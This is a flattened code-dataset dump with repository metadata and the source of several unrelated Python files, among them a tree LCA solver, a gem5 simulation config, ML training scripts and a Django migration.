hexsha
stringlengths
40
40
size
int64
3
1.03M
ext
stringclasses
10 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
3
972
max_stars_repo_name
stringlengths
6
130
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
listlengths
1
10
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
3
972
max_issues_repo_name
stringlengths
6
130
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
listlengths
1
10
max_issues_count
int64
1
116k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
3
972
max_forks_repo_name
stringlengths
6
130
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
listlengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
3
1.03M
avg_line_length
float64
1.13
941k
max_line_length
int64
2
941k
alphanum_fraction
float64
0
1
4a84ca1ff74d6ac1f9694eabe007799d5010cba3
3,728
py
Python
src/data/1220.py
NULLCT/LOMC
79a16474a8f21310e0fb47e536d527dd5dc6d655
[ "MIT" ]
null
null
null
src/data/1220.py
NULLCT/LOMC
79a16474a8f21310e0fb47e536d527dd5dc6d655
[ "MIT" ]
null
null
null
src/data/1220.py
NULLCT/LOMC
79a16474a8f21310e0fb47e536d527dd5dc6d655
[ "MIT" ]
null
null
null
#!/usr/bin python3 # -*- coding: utf-8 -*- class Tree(): def __init__(self, n): self.n = n self.edges = [[] for _ in range(n)] self.root = None # 根 self.etnodes = [] # i番目の頂点番号 self.etedges = [] # i番目の辺の番号 self.etL = [0] * n # in self.etR = [0] * n # out self.depthbynodes = [0] * n self.etdepth = [] # i番目の辺の def add_edge(self, u, v): self.edges[u].append(v) self.edges[v].append(u) def set_euler_tour(self, root): self.root = root # 根を設定して pa = [0] * self.n stack = [~root, root] ct = -1 de = -1 while stack: v = stack.pop() ct += 1 self.etedges.append(v) if v >= 0: de += 1 self.etnodes.append(v) self.etdepth.append(de) self.etL[v] = ct self.depthbynodes[v] = de p = pa[v] for w in self.edges[v][::-1]: if w == p: continue pa[w] = v stack.append(~w) stack.append(w) else: de -= 1 if de < 0: self.etdepth.append(self.n) else: self.etdepth.append(de) self.etnodes.append(pa[~v]) self.etR[~v] = ct ############################################# class SegmentTree: # 初期化処理 # f : SegmentTreeにのせるモノイド # idele : fに対する単位元 def __init__(self, size, f=lambda x, y: min(x, y), idele=float('inf')): self.size = 2**(size - 1).bit_length() # 簡単のため要素数nを2冪にする self.idele = idele # 単位元 self.f = f # モノイド self.dat = [(self.idele, -1)] * (self.size * 2) # 要素を単位元で初期化 ## one point def update(self, i, x): i += self.size # 1番下の層におけるインデックス self.dat[i] = (x, i) while i > 0: # 層をのぼりながら値を更新 indexが0になれば終了 i >>= 1 # 1つ上の層のインデックス(完全二分木における親) # 下の層2つの演算結果の代入(完全二分木における子同士の演算) self.dat[i] = self.f(self.dat[i * 2], self.dat[i * 2 + 1]) ## range def query(self, l, r): l += self.size # 1番下の層におけるインデックス r += self.size # 1番下の層におけるインデックス lres, rres = (self.idele, -1), (self.idele, -1) # 左側の答えと右側の答えを初期化 while l < r: # lとrが重なるまで上記の判定を用いて演算を実行 # 左が子同士の右側(lが奇数)(lの末桁=1)ならば、dat[l]を加算 if l & 1: lres = self.f(lres, self.dat[l]) l += 1 # 右が子同士の右側(rが奇数)(rの末桁=1)ならば、dat[r-1]を加算 if r & 1: r -= 1 rres = self.f(self.dat[r], rres) # モノイドでは可換律は保証されていないので演算の方向に注意 l >>= 1 r >>= 1 res = self.f(lres, rres) return res def init(self, a): for i, x in enumerate(a): # 1番下の層におけるインデックス self.dat[i + self.size] = (x, i) for i in range(self.size - 1, -1, -1): self.dat[i] = self.f(self.dat[i * 2], self.dat[i * 2 + 1]) ############################################ n, q = map(int, input().split()) T = Tree(n) for _ in range(n - 1): a, b = map(int, input().split()) T.add_edge(a - 1, b - 1) T.set_euler_tour(0) depth = T.etdepth SGT = SegmentTree(len(depth)) SGT.init(depth) for i in range(q): a, b = map(int, input().split()) a -= 1 b -= 1 l = T.etL[a] r = T.etL[b] if l > r: l, r = r, l r += 1 x = SGT.query(l, r)[1] lca = T.etnodes[x] d = T.depthbynodes[a] + T.depthbynodes[b] - 2 * T.depthbynodes[lca] if d % 2 == 0: print('Town') else: print('Road')
28.242424
75
0.441792
3f37e86b6e246dcfd4af33dc291c99d749027858
705
py
Python
plenum/test/node_request/test_pre_prepare/test_num_of_pre_prepare_with_one_fault.py
steptan/indy-plenum
488bf63c82753a74a92ac6952da784825ffd4a3d
[ "Apache-2.0" ]
null
null
null
plenum/test/node_request/test_pre_prepare/test_num_of_pre_prepare_with_one_fault.py
steptan/indy-plenum
488bf63c82753a74a92ac6952da784825ffd4a3d
[ "Apache-2.0" ]
null
null
null
plenum/test/node_request/test_pre_prepare/test_num_of_pre_prepare_with_one_fault.py
steptan/indy-plenum
488bf63c82753a74a92ac6952da784825ffd4a3d
[ "Apache-2.0" ]
2
2017-12-13T21:14:54.000Z
2021-06-06T15:48:03.000Z
from functools import partial import pytest from stp_core.common.util import adict from plenum.test.malicious_behaviors_node import makeNodeFaulty, \ delaysPrePrepareProcessing nodeCount = 4 faultyNodes = 1 whitelist = ['cannot process incoming PREPARE'] @pytest.fixture(scope="module") def setup(txnPoolNodeSet): A = txnPoolNodeSet[-1] makeNodeFaulty(A, partial(delaysPrePrepareProcessing, delay=60)) # A.delaySelfNomination(10) return adict(faulties=A) @pytest.fixture(scope="module") def afterElection(setup): for r in setup.faulties.replicas: assert not r.isPrimary def testNumOfPrePrepareWithOneFault(afterElection, preprepared1): pass
22.741935
66
0.747518
9663633d8e9dc1620e4de66cde0433a0b68a5cd5
1,261
py
Python
Basic_Python_Programs/lab 3.py
Techme2911/HacktoberFest19-Algo
1ca4007cc014b9d9131be92f362f4d2f846cdbc4
[ "MIT" ]
86
2015-06-13T16:53:55.000Z
2022-03-24T20:56:42.000Z
Basic_Python_Programs/lab 3.py
Techme2911/HacktoberFest19-Algo
1ca4007cc014b9d9131be92f362f4d2f846cdbc4
[ "MIT" ]
9
2015-05-27T07:52:44.000Z
2022-03-29T21:52:40.000Z
Basic_Python_Programs/lab 3.py
Techme2911/HacktoberFest19-Algo
1ca4007cc014b9d9131be92f362f4d2f846cdbc4
[ "MIT" ]
124
2015-12-10T01:17:18.000Z
2021-11-08T04:03:38.000Z
# 1. WAP to create and merge two list and then sort it wihtout function sort # 2. WAP to create list of number and sort even numbers using LIST COMPREHENSION # 3. WAP to calculate number of uppercase and lowercase from input string. l1=[] l2=[] a=int(input("Enter number of elements you want to enter in list 1: ")) b=int(input("Enter number of elements you want to enter in list 2: ")) for i in range(a): x=int(input("Enter List Element: ")) l1.append(x) for i in range(b): x=int(input("Enter List Element: ")) l2.append(x) l1.extend(l2) m=[] for i in range (len(l1)): m.append(min(l1)) l1.remove(min(l1)) m.extend(l1) print(m,end=" ") print("is your sorted list") #P2 l=[] a=int(input("Number of elements in the list: ")) for i in range(a): x=int(input("Enter List Element: ")) l.append(x) lee=[i for i in l if i%2==0] print("List of your even numbers is={evenlist}".format(evenlist=lee)) #P3 s=input("Enter any word string: ") cu=0 cl=0 for i in s: if i.isupper(): cu=cu+1 else: cl=cl+1 print("Number of lower case:",cl) print("Number of upper case:",cu)
21.741379
81
0.581285
b59ca589ddd8a93913244f35064d7b2cb72c65e1
847
py
Python
setup.py
Erotemic/performer-pytorch
968d3340a6a6d0cfd5bc208974bec85aa270e071
[ "MIT" ]
829
2020-10-03T15:38:41.000Z
2022-03-28T15:22:16.000Z
setup.py
Erotemic/performer-pytorch
968d3340a6a6d0cfd5bc208974bec85aa270e071
[ "MIT" ]
77
2020-10-05T18:55:14.000Z
2022-03-28T00:16:29.000Z
setup.py
Erotemic/performer-pytorch
968d3340a6a6d0cfd5bc208974bec85aa270e071
[ "MIT" ]
125
2020-10-11T11:11:18.000Z
2022-03-29T11:14:24.000Z
from setuptools import setup, find_packages setup( name = 'performer-pytorch', packages = find_packages(exclude=['examples']), version = '1.1.0', license='MIT', description = 'Performer - Pytorch', author = 'Phil Wang', author_email = 'lucidrains@gmail.com', url = 'https://github.com/lucidrains/performer-pytorch', keywords = [ 'artificial intelligence', 'attention mechanism', 'efficient attention', 'transformers' ], install_requires=[ 'einops>=0.3', 'local-attention>=1.1.1', 'torch>=1.6', 'axial-positional-embedding>=0.1.0' ], classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Developers', 'Topic :: Scientific/Engineering :: Artificial Intelligence', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 3.6', ], )
26.46875
65
0.646989
40f9db98c9d8059a7452f93c8f695a22564f9018
2,558
py
Python
test.py
manestay/CartoonGAN-4731
f8580a7f027d6505ce0e5c15314e2b53fe18b69e
[ "MIT" ]
4
2019-01-23T16:00:06.000Z
2020-05-06T12:45:00.000Z
test.py
manestay/CartoonGAN-4731
f8580a7f027d6505ce0e5c15314e2b53fe18b69e
[ "MIT" ]
null
null
null
test.py
manestay/CartoonGAN-4731
f8580a7f027d6505ce0e5c15314e2b53fe18b69e
[ "MIT" ]
1
2019-12-03T13:16:15.000Z
2019-12-03T13:16:15.000Z
import os, time, pickle, argparse, networks, utils import torch import torch.nn as nn import torch.optim as optim import matplotlib.pyplot as plt from torchvision import transforms parser = argparse.ArgumentParser() parser.add_argument('--name', required=False, default='project_name', help='') parser.add_argument('--in_ngc', type=int, default=3, help='input channel for generator') parser.add_argument('--out_ngc', type=int, default=3, help='output channel for generator') parser.add_argument('--batch_size', type=int, default=8, help='batch size') parser.add_argument('--ngf', type=int, default=64) parser.add_argument('--nb', type=int, default=8, help='the number of resnet block layer for generator') parser.add_argument('--input_size_h', type=int, default=180, help='input size height') parser.add_argument('--input_size_w', type=int, default=320, help='input size width') parser.add_argument('--pre_trained_model', required=True, default='pre_trained_model', help='pre_trained cartoongan model path') parser.add_argument('--image_dir', required=True, default='image_dir', help='test image path') parser.add_argument('--output_image_dir', required=True, default='output_image_dir', help='output test image path') args = parser.parse_args() device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if torch.backends.cudnn.enabled: torch.backends.cudnn.benchmark = True G = networks.generator(args.in_ngc, args.out_ngc, args.ngf, args.nb) if torch.cuda.is_available(): G.load_state_dict(torch.load(args.pre_trained_model)) else: # cpu mode G.load_state_dict(torch.load(args.pre_trained_model, map_location=lambda storage, loc: storage)) G.to(device) src_transform = transforms.Compose([ transforms.Resize((args.input_size_h, args.input_size_w)), transforms.ToTensor(), transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5)) ]) # utils.data_load(os.path.join('data', args.src_data), 'test', src_transform, 1, shuffle=True, drop_last=True) image_src = utils.data_load(os.path.join(args.image_dir), 'test', src_transform, 1, shuffle=False, drop_last=True) os.makedirs(args.output_image_dir, exist_ok=True) with torch.no_grad(): G.eval() num_digits = len(str(len(image_src))) for n, (x, _) in enumerate(image_src): x = x.to(device) G_recon = G(x) result = torch.cat((x[0], G_recon[0]), 2) path = os.path.join(args.output_image_dir, str(n + 1).zfill(num_digits) + '.png') plt.imsave(path, (result.cpu().numpy().transpose(1, 2, 0) + 1) / 2)
50.156863
128
0.725567
0f87e2b3acb3ca950e04a77204cb3e0314b81867
16,483
py
Python
configs/example/fs.py
MRGuenther/DynamicPrefetch
02627350c08868ad3988fe89fc004f0bac1a4c14
[ "BSD-3-Clause" ]
1
2020-11-24T14:39:55.000Z
2020-11-24T14:39:55.000Z
configs/example/fs.py
MRGuenther/DynamicPrefetch
02627350c08868ad3988fe89fc004f0bac1a4c14
[ "BSD-3-Clause" ]
null
null
null
configs/example/fs.py
MRGuenther/DynamicPrefetch
02627350c08868ad3988fe89fc004f0bac1a4c14
[ "BSD-3-Clause" ]
1
2021-12-08T10:19:20.000Z
2021-12-08T10:19:20.000Z
# Copyright (c) 2010-2013, 2016 ARM Limited # All rights reserved. # # The license below extends only to copyright in the software and shall # not be construed as granting a license to any other intellectual # property including but not limited to intellectual property relating # to a hardware implementation of the functionality of the software # licensed hereunder. You may use the software subject to the license # terms below provided that you ensure that this notice is replicated # unmodified and in its entirety in all distributions of the software, # modified or unmodified, in source code or in binary form. # # Copyright (c) 2012-2014 Mark D. Hill and David A. Wood # Copyright (c) 2009-2011 Advanced Micro Devices, Inc. # Copyright (c) 2006-2007 The Regents of The University of Michigan # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer; # redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution; # neither the name of the copyright holders nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # Authors: Ali Saidi # Brad Beckmann from __future__ import print_function import optparse import sys import m5 from m5.defines import buildEnv from m5.objects import * from m5.util import addToPath, fatal, warn from m5.util.fdthelper import * addToPath('../') from ruby import Ruby from common.FSConfig import * from common.SysPaths import * from common.Benchmarks import * from common import Simulation from common import CacheConfig from common import MemConfig from common import CpuConfig from common.Caches import * from common import Options # Check if KVM support has been enabled, we might need to do VM # configuration if that's the case. have_kvm_support = 'BaseKvmCPU' in globals() def is_kvm_cpu(cpu_class): return have_kvm_support and cpu_class != None and \ issubclass(cpu_class, BaseKvmCPU) def cmd_line_template(): if options.command_line and options.command_line_file: print("Error: --command-line and --command-line-file are " "mutually exclusive") sys.exit(1) if options.command_line: return options.command_line if options.command_line_file: return open(options.command_line_file).read().strip() return None def build_test_system(np): cmdline = cmd_line_template() if buildEnv['TARGET_ISA'] == "alpha": test_sys = makeLinuxAlphaSystem(test_mem_mode, bm[0], options.ruby, cmdline=cmdline) elif buildEnv['TARGET_ISA'] == "mips": test_sys = makeLinuxMipsSystem(test_mem_mode, bm[0], cmdline=cmdline) elif buildEnv['TARGET_ISA'] == "sparc": test_sys = makeSparcSystem(test_mem_mode, bm[0], cmdline=cmdline) elif buildEnv['TARGET_ISA'] == "x86": test_sys = makeLinuxX86System(test_mem_mode, options.num_cpus, bm[0], options.ruby, cmdline=cmdline) elif buildEnv['TARGET_ISA'] == "arm": test_sys = makeArmSystem(test_mem_mode, options.machine_type, options.num_cpus, bm[0], options.dtb_filename, bare_metal=options.bare_metal, cmdline=cmdline, ignore_dtb=options.generate_dtb, external_memory= options.external_memory_system, ruby=options.ruby, security=options.enable_security_extensions) if options.enable_context_switch_stats_dump: test_sys.enable_context_switch_stats_dump = True else: fatal("Incapable of building %s full system!", buildEnv['TARGET_ISA']) # Set the cache line size for the entire system test_sys.cache_line_size = options.cacheline_size # Create a top-level voltage domain test_sys.voltage_domain = VoltageDomain(voltage = options.sys_voltage) # Create a source clock for the system and set the clock period test_sys.clk_domain = SrcClockDomain(clock = options.sys_clock, voltage_domain = test_sys.voltage_domain) # Create a CPU voltage domain test_sys.cpu_voltage_domain = VoltageDomain() # Create a source clock for the CPUs and set the clock period test_sys.cpu_clk_domain = SrcClockDomain(clock = options.cpu_clock, voltage_domain = test_sys.cpu_voltage_domain) if options.kernel is not None: test_sys.kernel = binary(options.kernel) if options.script is not None: test_sys.readfile = options.script if options.lpae: test_sys.have_lpae = True if options.virtualisation: test_sys.have_virtualization = True test_sys.init_param = options.init_param # For now, assign all the CPUs to the same clock domain test_sys.cpu = [TestCPUClass(clk_domain=test_sys.cpu_clk_domain, cpu_id=i) for i in xrange(np)] if is_kvm_cpu(TestCPUClass) or is_kvm_cpu(FutureClass): test_sys.kvm_vm = KvmVM() if options.ruby: Ruby.create_system(options, True, test_sys, test_sys.iobus, test_sys._dma_ports) # Create a seperate clock domain for Ruby test_sys.ruby.clk_domain = SrcClockDomain(clock = options.ruby_clock, voltage_domain = test_sys.voltage_domain) # Connect the ruby io port to the PIO bus, # assuming that there is just one such port. test_sys.iobus.master = test_sys.ruby._io_port.slave for (i, cpu) in enumerate(test_sys.cpu): # # Tie the cpu ports to the correct ruby system ports # cpu.clk_domain = test_sys.cpu_clk_domain cpu.createThreads() cpu.createInterruptController() cpu.icache_port = test_sys.ruby._cpu_ports[i].slave cpu.dcache_port = test_sys.ruby._cpu_ports[i].slave if buildEnv['TARGET_ISA'] in ("x86", "arm"): cpu.itb.walker.port = test_sys.ruby._cpu_ports[i].slave cpu.dtb.walker.port = test_sys.ruby._cpu_ports[i].slave if buildEnv['TARGET_ISA'] in "x86": cpu.interrupts[0].pio = test_sys.ruby._cpu_ports[i].master cpu.interrupts[0].int_master = test_sys.ruby._cpu_ports[i].slave cpu.interrupts[0].int_slave = test_sys.ruby._cpu_ports[i].master else: if options.caches or options.l2cache: # By default the IOCache runs at the system clock test_sys.iocache = IOCache(addr_ranges = test_sys.mem_ranges) test_sys.iocache.cpu_side = test_sys.iobus.master test_sys.iocache.mem_side = test_sys.membus.slave elif not options.external_memory_system: test_sys.iobridge = Bridge(delay='50ns', ranges = test_sys.mem_ranges) test_sys.iobridge.slave = test_sys.iobus.master test_sys.iobridge.master = test_sys.membus.slave # Sanity check if options.fastmem: if TestCPUClass != AtomicSimpleCPU: fatal("Fastmem can only be used with atomic CPU!") if (options.caches or options.l2cache): fatal("You cannot use fastmem in combination with caches!") if options.simpoint_profile: if not options.fastmem: # Atomic CPU checked with fastmem option already fatal("SimPoint generation should be done with atomic cpu and fastmem") if np > 1: fatal("SimPoint generation not supported with more than one CPUs") for i in xrange(np): if options.fastmem: test_sys.cpu[i].fastmem = True if options.simpoint_profile: test_sys.cpu[i].addSimPointProbe(options.simpoint_interval) if options.checker: test_sys.cpu[i].addCheckerCpu() test_sys.cpu[i].createThreads() # If elastic tracing is enabled when not restoring from checkpoint and # when not fast forwarding using the atomic cpu, then check that the # TestCPUClass is DerivO3CPU or inherits from DerivO3CPU. If the check # passes then attach the elastic trace probe. # If restoring from checkpoint or fast forwarding, the code that does this for # FutureCPUClass is in the Simulation module. If the check passes then the # elastic trace probe is attached to the switch CPUs. if options.elastic_trace_en and options.checkpoint_restore == None and \ not options.fast_forward: CpuConfig.config_etrace(TestCPUClass, test_sys.cpu, options) CacheConfig.config_cache(options, test_sys) MemConfig.config_mem(options, test_sys) return test_sys def build_drive_system(np): # driver system CPU is always simple, so is the memory # Note this is an assignment of a class, not an instance. DriveCPUClass = AtomicSimpleCPU drive_mem_mode = 'atomic' DriveMemClass = SimpleMemory cmdline = cmd_line_template() if buildEnv['TARGET_ISA'] == 'alpha': drive_sys = makeLinuxAlphaSystem(drive_mem_mode, bm[1], cmdline=cmdline) elif buildEnv['TARGET_ISA'] == 'mips': drive_sys = makeLinuxMipsSystem(drive_mem_mode, bm[1], cmdline=cmdline) elif buildEnv['TARGET_ISA'] == 'sparc': drive_sys = makeSparcSystem(drive_mem_mode, bm[1], cmdline=cmdline) elif buildEnv['TARGET_ISA'] == 'x86': drive_sys = makeLinuxX86System(drive_mem_mode, np, bm[1], cmdline=cmdline) elif buildEnv['TARGET_ISA'] == 'arm': drive_sys = makeArmSystem(drive_mem_mode, options.machine_type, np, bm[1], options.dtb_filename, cmdline=cmdline, ignore_dtb=options.generate_dtb) # Create a top-level voltage domain drive_sys.voltage_domain = VoltageDomain(voltage = options.sys_voltage) # Create a source clock for the system and set the clock period drive_sys.clk_domain = SrcClockDomain(clock = options.sys_clock, voltage_domain = drive_sys.voltage_domain) # Create a CPU voltage domain drive_sys.cpu_voltage_domain = VoltageDomain() # Create a source clock for the CPUs and set the clock period drive_sys.cpu_clk_domain = SrcClockDomain(clock = options.cpu_clock, voltage_domain = drive_sys.cpu_voltage_domain) drive_sys.cpu = DriveCPUClass(clk_domain=drive_sys.cpu_clk_domain, cpu_id=0) drive_sys.cpu.createThreads() drive_sys.cpu.createInterruptController() drive_sys.cpu.connectAllPorts(drive_sys.membus) if options.fastmem: drive_sys.cpu.fastmem = True if options.kernel is not None: drive_sys.kernel = binary(options.kernel) if is_kvm_cpu(DriveCPUClass): drive_sys.kvm_vm = KvmVM() drive_sys.iobridge = Bridge(delay='50ns', ranges = drive_sys.mem_ranges) drive_sys.iobridge.slave = drive_sys.iobus.master drive_sys.iobridge.master = drive_sys.membus.slave # Create the appropriate memory controllers and connect them to the # memory bus drive_sys.mem_ctrls = [DriveMemClass(range = r) for r in drive_sys.mem_ranges] for i in xrange(len(drive_sys.mem_ctrls)): drive_sys.mem_ctrls[i].port = drive_sys.membus.master drive_sys.init_param = options.init_param return drive_sys # Add options parser = optparse.OptionParser() Options.addCommonOptions(parser) Options.addFSOptions(parser) # Add the ruby specific and protocol specific options if '--ruby' in sys.argv: Ruby.define_options(parser) (options, args) = parser.parse_args() if args: print("Error: script doesn't take any positional arguments") sys.exit(1) # system under test can be any CPU (TestCPUClass, test_mem_mode, FutureClass) = Simulation.setCPUClass(options) # Match the memories with the CPUs, based on the options for the test system TestMemClass = Simulation.setMemClass(options) if options.benchmark: try: bm = Benchmarks[options.benchmark] except KeyError: print("Error benchmark %s has not been defined." % options.benchmark) print("Valid benchmarks are: %s" % DefinedBenchmarks) sys.exit(1) else: if options.dual: bm = [SysConfig(disk=options.disk_image, rootdev=options.root_device, mem=options.mem_size, os_type=options.os_type), SysConfig(disk=options.disk_image, rootdev=options.root_device, mem=options.mem_size, os_type=options.os_type)] else: bm = [SysConfig(disk=options.disk_image, rootdev=options.root_device, mem=options.mem_size, os_type=options.os_type)] np = options.num_cpus test_sys = build_test_system(np) if len(bm) == 2: drive_sys = build_drive_system(np) root = makeDualRoot(True, test_sys, drive_sys, options.etherdump) elif len(bm) == 1 and options.dist: # This system is part of a dist-gem5 simulation root = makeDistRoot(test_sys, options.dist_rank, options.dist_size, options.dist_server_name, options.dist_server_port, options.dist_sync_repeat, options.dist_sync_start, options.ethernet_linkspeed, options.ethernet_linkdelay, options.etherdump); elif len(bm) == 1: root = Root(full_system=True, system=test_sys) else: print("Error I don't know how to create more than 2 systems.") sys.exit(1) if options.timesync: root.time_sync_enable = True if options.frame_capture: VncServer.frame_capture = True if buildEnv['TARGET_ISA'] == "arm" and options.generate_dtb: # Sanity checks if options.dtb_filename: fatal("--generate-dtb and --dtb-filename cannot be specified at the"\ "same time.") if options.machine_type not in ["VExpress_GEM5", "VExpress_GEM5_V1"]: warn("Can only correctly generate a dtb for VExpress_GEM5_V1 " \ "platforms, unless custom hardware models have been equipped "\ "with generation functionality.") # Generate a Device Tree def create_dtb_for_system(system, filename): state = FdtState(addr_cells=2, size_cells=2, cpu_cells=1) rootNode = system.generateDeviceTree(state) fdt = Fdt() fdt.add_rootnode(rootNode) dtb_filename = os.path.join(m5.options.outdir, filename) return fdt.writeDtbFile(dtb_filename) for sysname in ('system', 'testsys', 'drivesys'): if hasattr(root, sysname): sys = getattr(root, sysname) sys.dtb_filename = create_dtb_for_system(sys, '%s.dtb' % sysname) Simulation.setWorkCountOptions(test_sys, options) Simulation.run(options, root, test_sys, FutureClass)
41.310777
87
0.668022
433574e3ad7cb394257ec617aa8d7eddc16c97a1
411
py
Python
examples/how_to/get_version_info_from_last_good_build.py
tuenti/jenkinsapi
52548695da01bd431a6f9fc3c46f7ff42922af39
[ "MIT" ]
null
null
null
examples/how_to/get_version_info_from_last_good_build.py
tuenti/jenkinsapi
52548695da01bd431a6f9fc3c46f7ff42922af39
[ "MIT" ]
null
null
null
examples/how_to/get_version_info_from_last_good_build.py
tuenti/jenkinsapi
52548695da01bd431a6f9fc3c46f7ff42922af39
[ "MIT" ]
1
2019-12-08T16:20:22.000Z
2019-12-08T16:20:22.000Z
""" Extract version information from the latest build. """ from jenkinsapi.jenkins import Jenkins def getSCMInfroFromLatestGoodBuild(url, jobName, username=None, password=None): J = Jenkins(url, username, password) job = J[jobName] lgb = job.get_last_good_build() return lgb.get_revision() if __name__ == '__main__': print getSCMInfroFromLatestGoodBuild('http://localhost:8080', 'fooJob')
29.357143
79
0.739659
276c0039a116e6b116726f17dc5b6aa9fe574fdf
610
py
Python
djstripe/migrations/0012_account_djstripe_owner_account.py
TenantBase/dj-stripe
c3fe9da9dd0e15fd714c95402b7672aac07d43e1
[ "MIT" ]
null
null
null
djstripe/migrations/0012_account_djstripe_owner_account.py
TenantBase/dj-stripe
c3fe9da9dd0e15fd714c95402b7672aac07d43e1
[ "MIT" ]
null
null
null
djstripe/migrations/0012_account_djstripe_owner_account.py
TenantBase/dj-stripe
c3fe9da9dd0e15fd714c95402b7672aac07d43e1
[ "MIT" ]
null
null
null
# Generated by Django 3.2.11 on 2022-02-02 19:12 from django.conf import settings from django.db import migrations import django.db.models.deletion import djstripe.fields class Migration(migrations.Migration): dependencies = [ ('djstripe', '0011_2_7'), ] operations = [ migrations.AddField( model_name='account', name='djstripe_owner_account', field=djstripe.fields.StripeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='djstripe.account', to_field=settings.DJSTRIPE_FOREIGN_KEY_TO_FIELD), ), ]
27.727273
191
0.693443
a953834e2af3abb629ef0d9898fa39dfdb3dfe9b
8,187
py
Python
vision/visualizer_human.py
yihui-he2020/epipolar-transformers
6824f4345b2998500fbacd0f4e30f67f8e3da7b8
[ "MIT" ]
360
2020-03-30T07:15:45.000Z
2022-03-04T14:08:04.000Z
vision/visualizer_human.py
yihui-he2020/epipolar-transformers
6824f4345b2998500fbacd0f4e30f67f8e3da7b8
[ "MIT" ]
30
2020-05-12T11:12:20.000Z
2021-12-31T05:49:10.000Z
vision/visualizer_human.py
yihui-he2020/epipolar-transformers
6824f4345b2998500fbacd0f4e30f67f8e3da7b8
[ "MIT" ]
38
2020-05-12T05:33:46.000Z
2022-01-25T22:27:45.000Z
import numpy as np import scipy.ndimage import skimage import cv2 import torch import matplotlib from matplotlib import pylab as plt # from mpl_toolkits.mplot3d import axes3d, Axes3D # matplotlib.use('Agg') CONNECTIVITY_DICT = { 'cmu': [(0, 2), (0, 9), (1, 0), (1, 17), (2, 12), (3, 0), (4, 3), (5, 4), (6, 2), (7, 6), (8, 7), (9, 10), (10, 11), (12, 13), (13, 14), (15, 1), (16, 15), (17, 18)], 'coco': [(0, 1), (0, 2), (1, 3), (2, 4), (5, 7), (7, 9), (6, 8), (8, 10), (11, 13), (13, 15), (12, 14), (14, 16), (5, 6), (5, 11), (6, 12), (11, 12)], "mpii": [(0, 1), (1, 2), (2, 6), (5, 4), (4, 3), (3, 6), (6, 7), (7, 8), (8, 9), (8, 12), (8, 13), (10, 11), (11, 12), (13, 14), (14, 15)], "human36m": [ (0, 1), (0, 4), #root hip (1, 2), (4, 5), #hip knee (2, 3), (5, 6), #knee ankle (0, 7), #root belly (7, 8), #belly neck (8, 9), #neck nose (9, 10), #nose head (8, 11), (8, 14), #neck shoulder (11, 12), (14, 15), #shoulder elbow (12, 13), (15, 16), #elbow wrist ], "kth": [(0, 1), (1, 2), (5, 4), (4, 3), (6, 7), (7, 8), (11, 10), (10, 9), (2, 3), (3, 9), (2, 8), (9, 12), (8, 12), (12, 13)], } COLOR_DICT = { 'coco': [ (102, 0, 153), (153, 0, 102), (51, 0, 153), (153, 0, 153), # head (51, 153, 0), (0, 153, 0), # left arm (153, 102, 0), (153, 153, 0), # right arm (0, 51, 153), (0, 0, 153), # left leg (0, 153, 102), (0, 153, 153), # right leg (153, 0, 0), (153, 0, 0), (153, 0, 0), (153, 0, 0) # body ], 'human36m': [ (0, 153, 102), (0, 153, 153), (0, 153, 153), # right leg (0, 51, 153), (0, 0, 153), (0, 0, 153), # left leg (153, 0, 0), (153, 0, 0), # body (153, 0, 102), (153, 0, 102), # head (153, 153, 0), (153, 153, 0), (153, 102, 0), # right arm (0, 153, 0), (0, 153, 0), (51, 153, 0) # left arm ], 'kth': [ (0, 153, 102), (0, 153, 153), # right leg (0, 51, 153), (0, 0, 153), # left leg (153, 102, 0), (153, 153, 0), # right arm (51, 153, 0), (0, 153, 0), # left arm (153, 0, 0), (153, 0, 0), (153, 0, 0), (153, 0, 0), (153, 0, 0), # body (102, 0, 153) # head ] } JOINT_NAMES_DICT = { 'coco': { 0: "nose", 1: "left_eye", 2: "right_eye", 3: "left_ear", 4: "right_ear", 5: "left_shoulder", 6: "right_shoulder", 7: "left_elbow", 8: "right_elbow", 9: "left_wrist", 10: "right_wrist", 11: "left_hip", 12: "right_hip", 13: "left_knee", 14: "right_knee", 15: "left_ankle", 16: "right_ankle" } } def draw_2d_pose(keypoints, ax, kind='human36m', keypoints_mask=None, point_size=8, line_width=3, radius=None, color=None): """ Visualizes a 2d 